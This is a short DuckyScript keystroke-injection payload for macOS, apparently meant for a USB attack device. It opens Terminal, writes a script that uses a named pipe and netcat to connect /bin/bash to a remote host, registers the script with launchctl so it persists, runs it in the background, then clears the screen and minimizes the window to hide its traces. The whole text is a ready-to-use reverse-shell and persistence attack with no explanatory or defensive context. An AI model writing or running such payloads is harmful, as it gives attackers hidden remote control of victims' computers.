GUI SPACE
DELAY 500
STRING terminal
ENTER
DELAY 600
STRING touch script.sh
ENTER
STRING echo "mkfifo foo" > script.sh
ENTER
STRING echo "nc ipport <foo | /bin/bash 1>foo" >> script.sh
ENTER
STRING chmod +rwx script.sh
ENTER
STRING launchctl submit -l someName -p ~/script.sh
ENTER
STRING ./script.sh&
ENTER
STRING clear
ENTER
GUI m
